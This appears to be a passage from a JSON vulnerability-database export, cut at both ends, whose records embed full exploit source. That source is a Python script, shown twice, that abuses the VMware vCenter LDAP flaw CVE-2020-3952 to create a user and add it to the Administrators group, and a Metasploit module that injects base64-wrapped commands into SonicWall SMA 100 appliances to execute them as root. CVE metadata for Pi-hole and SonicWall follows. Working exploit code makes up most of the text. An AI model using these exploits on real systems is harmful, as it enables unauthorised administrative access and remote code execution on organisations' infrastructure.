Windows as Linux (as MacOS, probably ;-) \n \nFeatures: exploit + vulnerability checker \n''' \n \nimport binascii, socket, sys, string, random \n \n## Default vars; change at will \n_sIP = '192.168.50.35' \n_iPORT = 389 \n_iTIMEOUT = 5 \n \ndef randomString(iStringLength=8): \n#sLetters = string.ascii_lowercase \nsLetters = string.ascii_letters \nreturn ''.join(random.choice(sLetters) for i in range(iStringLength)) \n \ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified \n## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed \nsReturn = sPrefix \nif (len(sData) / 2 ) > 255: \nsReturn += b'82' \nhexBytes = 2 \nelif (len(sData) /2 ) >= 128: \nsReturn += b'81' \nsReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode() \nreturn sReturn \n \ndef buildBindRequestPacket(sUser, sPass): \nsUser = binascii.hexlify(sUser.encode()) \nsPass = binascii.hexlify(sPass.encode()) \n## Packet Construction \nsPacket = getLengthPrefix(sPass, b'80') + sPass \nsPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket \nsPacket = b'020103' + sPacket \nsPacket = getLengthPrefix(sPacket, b'60') + sPacket \nsPacket = b'020101' + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef buildUserCreatePacket(sUser, sPass): \nsUser = binascii.hexlify(sUser.encode()) \nsPass = binascii.hexlify(sPass.encode()) \ndef createAttribute(sName, sValue): \nsValue = getLengthPrefix(sValue, b'04') + sValue \nsName = getLengthPrefix(sName, b'04') + sName \n \nsReturn = getLengthPrefix(sValue, b'31') + sValue \nsReturn = sName + sReturn \nsReturn = getLengthPrefix(sReturn, b'30') + sReturn \nreturn sReturn \n \ndef createObjectClass(): \nsReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') \nsReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') \nsReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') \nsReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') \n \nsReturn = getLengthPrefix(sReturn, b'31') + sReturn \nsReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn \nsReturn = getLengthPrefix(sReturn, b'30') + sReturn \nreturn sReturn \n \n## Attributes \nsAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) \nsAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) \nsAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) \nsAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) \nsAttributes += createObjectClass() \nsAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) \n## CN \nsCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') \nsUserEntry = getLengthPrefix(sCN, b'04') + sCN \n \n## Packet Assembly (bottom up) \nsPacket = getLengthPrefix(sAttributes, b'30') + sAttributes \nsPacket = sUserEntry + sPacket \nsPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef buildModifyUserPacket(sUser): \nsFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) \nsCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') \nsMember = binascii.hexlify(b'member') \n## Packet Construction \nsPacket = getLengthPrefix(sFQDN, b'04') + sFQDN \nsPacket = getLengthPrefix(sPacket, b'31') + sPacket \nsPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket \nsPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \nsPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket \nsPacket = getLengthPrefix(sPacket, b'02010366') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef performBind(s): \n## Trying to bind, fails, but necessary (even fails when using correct credentials) \ndPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be') \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsResponse = sResponse.split(b'\\x04\\x00')[0][-1:] \nsCode = binascii.hexlify(sResponse).decode() \nif sCode == '31': print('[+] Ok, service reachable, continuing') \nelse: print('[-] Something went wrong') \nexcept: \npass \nreturn sCode \n \ndef performUserAdd(s, sUser, sPass): \ndPacket = buildUserCreatePacket(sUser,sPass) \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsCode = sResponse.split(b'\\x04\\x00')[0][-1:] \nsMessage = sResponse.split(b'\\x04\\x00')[1] \nif sCode == b'\\x00': \nprint('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) \nelif sCode == b'\\x32': \nprint('[-] Error, this host is not vulnerable (insufficientAccessRights)') \nelse: \nif sMessage[2] == b'81': sMessage = sMessage[3:].decode() \nelse: sMessage = sMessage[2:].decode() \nprint('[-] Error, user not added, message received: ' + sMessage) \nexcept: \npass \nreturn sCode \n \n \ndef performUserMod(s, sUser, verbose = True): \ndPacket = buildModifyUserPacket(sUser) \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsCode = sResponse.split(b'\\x04\\x00')[0][-1:] \nsMessage = sResponse.split(b'\\x04\\x00')[1] \nif sCode == b'\\x00': \nif verbose: print('[+] User modification success (if the above is OK).') \nelse: \nif sMessage[2] == b'81': sMessage = sMessage[3:].decode() \nelse: sMessage = sMessage[2:].decode() \nif verbose: print('[-] Error during modification, message received: ' + sMessage) \nexcept: \npass \nreturn sCode, sMessage \n \ndef performUnbind(s): \ntry: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00') \nexcept: pass \n \ndef main(): \nglobal _sIP, _iPORT, _iTIMEOUT \n_sUSER = 'user_' + randomString(6) \n_sPASS = randomString(8) + '_2020' \nbAdduser = False \nif len(sys.argv) == 1: \nprint('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') \nprint(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) \nprint(' Leave username & password empty for a vulnerability check') \nprint(' Watch out for vCenter/LDAP password requirements, leave empty for random password') \nprint(' But for now, I will ask questions') \nsAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') \nif not sAnswer == '': _sIP = sAnswer \nsAnswer = input('[?] Want to perform a check only? [Y/n]: ') \nif sAnswer.lower() == 'n': bAdduser = True \nif bAdduser: \nsAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') \nif not sAnswer == '': _sUSER = sAnswer \nsAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') \nif not sAnswer == '': _sPASS = sAnswer \nelse: \n_sIP = sys.argv[1] \nif len(sys.argv) >= 3: \n_sUSER = sys.argv[2] \nbAdduser = True \nif len(sys.argv) >= 4: _sPASS = sys.argv[3] \n \n## MAIN \nprint('') \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.settimeout(_iTIMEOUT) \ntry: \ns.connect((_sIP,_iPORT)) \nexcept: \nprint('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') \nsys.exit(1) \n \nperformBind(s) \n \nif bAdduser: \nsCode = performUserAdd(s, _sUSER, _sPASS) \n \nif not bAdduser: \nprint('[!] Checking vulnerability') \nsCode, sMessage = performUserMod(s, 'Administrator', False) \nif sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage) \nelse: print('[+] This host is vulnerable!') \nelse: \nsCode = performUserMod(s, _sUSER) \n \nperformUnbind(s) \n \ns.close() \n \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157896/vmwarevcenter67-bypass.txt"}], "zdt": [{"lastseen": "2022-01-14T01:40:28", "description": "This Metasploit module exploits an authenticated command injection vulnerability in the SonicWall SMA 100 series web interface. Exploitation results in command execution as root. The affected versions are 10.2.1.2-24sv and below, 10.2.0.8-37sv and below, and 9.0.0.11-31sv and below.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-13T00:00:00", "type": "zdt", "title": "SonicWall SMA 100 Series Authenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20039", "CVE-2021-20038"], "modified": "2022-01-13T00:00:00", "id": "1337DAY-ID-37230", "href": "https://0day.today/exploit/description/37230", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SonicWall SMA 100 Series Authenticated Command Injection',\n 'Description' => %q{\n This module exploits an authenticated command injection vulnerability\n in the SonicWall SMA 100 series web interface. Exploitation results in\n command execution as root. The affected versions are:\n\n - 10.2.1.2-24sv and below\n - 10.2.0.8-37sv and below\n - 9.0.0.11-31sv and below\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'jbaines-r7' # Vulnerability discovery and Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-20039' ],\n [ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'],\n [ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2'],\n [ 'URL', 'https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-12-14',\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'echo', 'printf' ]\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'PrependFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),\n OptString.new('SWDOMAIN', [true, 'The domain to log in to', 'LocalDomain']),\n OptString.new('PORTALNAME', [true, 'The portal to log in to', 'VirtualOffice'])\n ])\n end\n\n ##\n # Extract the version number from a javascript include in the login landing page.\n # And compare the version against known affected. Affected versions are:\n #\n # 10.2.1.2-24sv and below\n # 10.2.0.8-37sv and below\n # 9.0.0.11-31sv and below\n ##\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/welcome'),\n 'agent' => 'SonicWALL Mobile Connect'\n })\n return CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200\n\n version = res.body.match(/\\.([0-9.\\-a-z]+)\\.js\" type=/)\n return CheckCode::Unknown('Failed to retrieve the version information') unless version\n\n version = version[1]\n\n major, minor, revision, build = version.split('.', 4)\n build, point = build.split('-', 2)\n print_status(\"Version found: #{major}.#{minor}.#{revision}.#{build}-#{point}\")\n point.delete_suffix('sv')\n\n case major\n when '9'\n return CheckCode::Safe unless minor.to_i == 0 && revision.to_i == 0 && build.to_i <= 11 && point.to_i <= 31\n when '10'\n return CheckCode::Safe unless minor.to_i == 2\n\n case revision\n when '0'\n return CheckCode::Safe unless build.to_i <= 8 && point.to_i <= 37\n when '1'\n return CheckCode::Safe unless build.to_i <= 2 && point.to_i <= 24\n else\n return CheckCode::Safe\n end\n else\n return CheckCode::Safe\n end\n CheckCode::Appears('Based on the discovered version.')\n end\n\n def login\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/userLogin'),\n 'agent' => 'SonicWALL Mobile Connect',\n 'vars_post' =>\n {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'domain' => datastore['SWDOMAIN'],\n 'portalname' => datastore['PORTALNAME'],\n 'login' => 'true',\n 'verifyCert' => '0',\n 'ajax' => 'true'\n },\n 'keep_cookies' => true\n })\n\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200\n fail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=')\n print_good('Authentication successful')\n end\n\n ##\n # Send the exploit in the \"CERT\" field when \"deleting\" a certificate. The\n # backend requires the payload start with \"n\". Also, there is a very small\n # amount of space to fit the command into (otherwise we'll trigger a bof).\n # Finally! The command has a lot of disallowed characters: /$&|>;`^. Which\n # is problematically for basically all the payloads. The system also is\n # missing useful tools like wget, base64, and curl (10.2 has curl but\n # whatever). As such, it seemed the easiest thing to do is wrap the entire\n # command in base64 and then use perl to decode/execute it.\n ##\n def execute_command(cmd, _opts = {})\n cmd_encoded = Rex::Text.encode_base64(cmd)\n perl_eval = \"n\\nperl -MMIME::Base64 -e 'system(decode_base64(\\\"#{cmd_encoded}\\\"))'\"\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part('delete', nil, nil, 'form-data; name=\"buttontype\"')\n multipart_form.add_part(perl_eval, nil, nil, 'form-data; name=\"CERT\"')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/viewcert'),\n 'agent' => 'SonicWALL Mobile Connect',\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n }, 5)\n\n if res && res.code != 200\n # the response should always be 200, unless meterpreter holds the\n # connection open.\n fail_with(Failure::UnexpectedReply, 'Only expected 200 OK')\n end\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n login\n execute_cmdstager(linemax: 40)\n end\nend\n", "sourceHref": "https://0day.today/exploit/37230", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-19T21:59:12", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-06-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 6.7 - Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-06-01T00:00:00", "id": "1337DAY-ID-34499", "href": "https://0day.today/exploit/description/34499", "sourceData": "# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html\r\n# Version: vCenter Server 6.7 before update 3f\r\n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0)\r\n# CVE: CVE-2020-3952\r\n\r\n#!/usr/bin/env python3\r\n\r\n'''\r\n\tCopyright 2020 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952\r\n \r\n File name CVE-2020-3592.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n \r\n ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n\r\n Features: exploit + vulnerability checker\r\n'''\r\n\r\nimport binascii, socket, sys, string, random\r\n\r\n## Default vars; change at will\r\n_sIP = '192.168.50.35'\r\n_iPORT = 389\r\n_iTIMEOUT = 5\r\n\r\ndef randomString(iStringLength=8):\r\n #sLetters = string.ascii_lowercase\r\n sLetters = string.ascii_letters\r\n return ''.join(random.choice(sLetters) for i in range(iStringLength))\r\n\r\ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified\r\n ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed\r\n sReturn = sPrefix\r\n if (len(sData) / 2 ) > 255:\r\n sReturn += b'82'\r\n hexBytes = 2\r\n elif (len(sData) /2 ) >= 128:\r\n sReturn += b'81'\r\n sReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode()\r\n return sReturn\r\n\r\ndef buildBindRequestPacket(sUser, sPass):\r\n sUser = binascii.hexlify(sUser.encode())\r\n sPass = binascii.hexlify(sPass.encode())\r\n ## Packet Construction\r\n sPacket = getLengthPrefix(sPass, b'80') + sPass\r\n sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket\r\n sPacket = b'020103' + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'60') + sPacket\r\n sPacket = b'020101' + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket) \r\n\r\ndef buildUserCreatePacket(sUser, sPass):\r\n sUser = binascii.hexlify(sUser.encode())\r\n sPass = binascii.hexlify(sPass.encode())\r\n def createAttribute(sName, sValue):\r\n sValue = getLengthPrefix(sValue, b'04') + sValue\r\n sName = getLengthPrefix(sName, b'04') + sName\r\n \r\n sReturn = getLengthPrefix(sValue, b'31') + sValue\r\n sReturn = sName + sReturn\r\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\r\n return sReturn\r\n \r\n def createObjectClass():\r\n sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user')\r\n \r\n sReturn = getLengthPrefix(sReturn, b'31') + sReturn\r\n sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn\r\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\r\n return sReturn\r\n \r\n ## Attributes\r\n sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True'))\r\n sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL'))\r\n sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local'))\r\n sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser)\r\n sAttributes += createObjectClass()\r\n sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass)\r\n ## CN\r\n sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local')\r\n sUserEntry = getLengthPrefix(sCN, b'04') + sCN\r\n \r\n ## Packet Assembly (bottom up)\r\n sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes\r\n sPacket = sUserEntry + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket)\r\n\r\ndef buildModifyUserPacket(sUser):\r\n sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode())\r\n sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')\r\n sMember = binascii.hexlify(b'member')\r\n ## Packet Construction\r\n sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN\r\n sPacket = getLengthPrefix(sPacket, b'31') + sPacket\r\n sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket)\r\n\r\ndef performBind(s):\r\n ## Trying to bind, fails, but necessary (even fails when using correct credentials)\r\n dPacket = buildBindRequestPacket('[email\u00a0protected]','www.IC4.be')\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sResponse = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sCode = binascii.hexlify(sResponse).decode()\r\n if sCode == '31': print('[+] Ok, service reachable, continuing')\r\n else: print('[-] Something went wrong')\r\n except:\r\n pass\r\n return sCode\r\n\r\ndef performUserAdd(s, sUser, sPass):\r\n dPacket = buildUserCreatePacket(sUser,sPass)\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sMessage = sResponse.split(b'\\x04\\x00')[1]\r\n if sCode == b'\\x00':\r\n print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass)\r\n elif sCode == b'\\x32':\r\n print('[-] Error, this host is not vulnerable (insufficientAccessRights)')\r\n else:\r\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\r\n else: sMessage = sMessage[2:].decode()\r\n print('[-] Error, user not added, message received: ' + sMessage)\r\n except:\r\n pass\r\n return sCode\r\n \r\n\r\ndef performUserMod(s, sUser, verbose = True):\r\n dPacket = buildModifyUserPacket(sUser)\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sMessage = sResponse.split(b'\\x04\\x00')[1]\r\n if sCode == b'\\x00':\r\n if verbose: print('[+] User modification success (if the above is OK).')\r\n else:\r\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\r\n else: sMessage = sMessage[2:].decode()\r\n if verbose: print('[-] Error during modification, message received: ' + sMessage)\r\n except:\r\n pass\r\n return sCode, sMessage\r\n\r\ndef performUnbind(s):\r\n try: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00')\r\n except: pass\r\n\r\ndef main():\r\n global _sIP, _iPORT, _iTIMEOUT\r\n _sUSER = 'user_' + randomString(6)\r\n _sPASS = randomString(8) + '_2020'\r\n bAdduser = False\r\n if len(sys.argv) == 1:\r\n print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]')\r\n print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS)\r\n print(' Leave username & password empty for a vulnerability check')\r\n print(' Watch out for vCenter/LDAP password requirements, leave empty for random password')\r\n print(' But for now, I will ask questions')\r\n sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ')\r\n if not sAnswer == '': _sIP = sAnswer\r\n sAnswer = input('[?] Want to perform a check only? [Y/n]: ')\r\n if sAnswer.lower() == 'n': bAdduser = True\r\n if bAdduser:\r\n sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ')\r\n if not sAnswer == '': _sUSER = sAnswer\r\n sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ')\r\n if not sAnswer == '': _sPASS = sAnswer\r\n else:\r\n _sIP = sys.argv[1]\r\n if len(sys.argv) >= 3:\r\n _sUSER = sys.argv[2]\r\n bAdduser = True\r\n if len(sys.argv) >= 4: _sPASS = sys.argv[3]\r\n\r\n ## MAIN\r\n print('')\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.settimeout(_iTIMEOUT)\r\n try:\r\n s.connect((_sIP,_iPORT))\r\n except:\r\n print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable')\r\n sys.exit(1)\r\n\r\n performBind(s)\r\n\r\n if bAdduser:\r\n sCode = performUserAdd(s, _sUSER, _sPASS)\r\n\r\n if not bAdduser:\r\n print('[!] Checking vulnerability')\r\n sCode, sMessage = performUserMod(s, 'Administrator', False)\r\n if sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage)\r\n else: print('[+] This host is vulnerable!')\r\n else:\r\n sCode = performUserMod(s, _sUSER)\r\n \r\n performUnbind(s)\r\n \r\n s.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2020-07-19] #", "sourceHref": "https://0day.today/exploit/34499", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-04-25T22:55:22", "description": "Pi-hole's Web interface provides a central location to manage a Pi-hole instance and review performance statistics. Prior to Pi-hole Web interface version 5.5.1, the `validDomainWildcard` preg_match filter allows a malicious character through that can be used to execute code, list directories, and overwrite sensitive files. The issue lies in the fact that one of the periods is not escaped, allowing any character to be used in its place. A patch for this vulnerability was released in version 5.5.1.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-04T18:15:00", "type": "cve", "title": "CVE-2021-32706", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32706"], "modified": "2022-04-25T19:55:00", "cpe": [], "id": "CVE-2021-32706", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32706", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-04-01T16:30:50", "description": "Improper neutralization of special elements in the SMA100 management interface '/cgi-bin/viewcert' POST http method allows a remote authenticated attacker to inject arbitrary commands as a 'nobody' user. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-08T10:15:00", "type": "cve", "title": "CVE-2021-20039", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, 